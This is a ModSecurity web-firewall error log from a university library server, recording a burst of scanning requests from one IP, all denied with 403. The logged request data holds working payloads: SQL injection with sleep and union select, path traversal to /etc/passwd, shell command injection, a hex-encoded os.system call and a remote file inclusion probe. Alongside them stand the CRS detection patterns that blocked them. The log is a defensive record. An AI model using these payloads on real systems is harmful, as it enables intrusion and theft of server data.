[Tue Aug 29 11:35:22.383452 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAVPX4kAAAAF"]
[Tue Aug 29 11:35:23.370152 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAVsUcUAAAAb"]
[Tue Aug 29 11:35:24.305334 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATQXkgAAAAO"]
[Tue Aug 29 11:35:24.331508 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAASI0GgAAAAG"]
[Tue Aug 29 11:35:25.330450 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAATge98AAAAl"]
[Tue Aug 29 11:35:26.380953 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVvlHoAAAAe"]
[Tue Aug 29 11:35:27.315805 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUOaXMAAABG"]
[Tue Aug 29 11:35:27.316268 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVPX5IAAAAF"]
[Tue Aug 29 11:35:28.297303 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAVvlHwAAAAe"]
[Tue Aug 29 11:35:29.304002 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAVvlH4AAAAe"]
[Tue Aug 29 11:35:29.325273 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAATfd6QAAAAk"]
[Tue Aug 29 11:35:30.297380 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUNapIAAABF"]
[Tue Aug 29 11:35:31.381274 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11k8Co-f0AAAPY1s4AAAAh"]
[Tue Aug 29 11:35:32.307767 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAT9PR8AAAA1"]
[Tue Aug 29 11:35:32.329623 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAT9PSAAAAA1"]
[Tue Aug 29 11:35:32.333063 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVr@TAAAAAZ"]
[Tue Aug 29 11:35:33.343976 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAVRxfsAAAAQ"]
[Tue Aug 29 11:35:34.308381 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAT2JUUAAAAz"]
[Tue Aug 29 11:35:34.313696 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAATQXk8AAAAO"]
[Tue Aug 29 11:35:34.367716 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVoCCoAAAAY"]
[Tue Aug 29 11:35:35.340512 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAT2JUoAAAAz"]
[Tue Aug 29 11:35:35.383944 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAATWYV4AAAAa"]
[Tue Aug 29 11:36:24.498772 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAAUFdgoAAAA9"]
[Tue Aug 29 11:36:24.525717 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAATQXmMAAAAO"]
[Tue Aug 29 11:36:24.546243 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAASHiCwAAAAD"]
[Tue Aug 29 11:36:25.242569 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAUbg6gAAABQ"]
[Tue Aug 29 11:36:26.552065 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWdskQAAAAM"]
[Tue Aug 29 11:36:28.415453 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWcCQkAAAAL"]
[Tue Aug 29 11:36:28.440783 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWlCbAAAAAR"]
[Tue Aug 29 11:36:30.372430 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAUFdhoAAAA9"]
[Tue Aug 29 11:36:32.372172 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAASEJecAAAAE"]
[Tue Aug 29 11:36:33.427227 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAUbg7wAAABQ"]
[Tue Aug 29 11:36:33.551903 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAASHiDgAAAAD"]
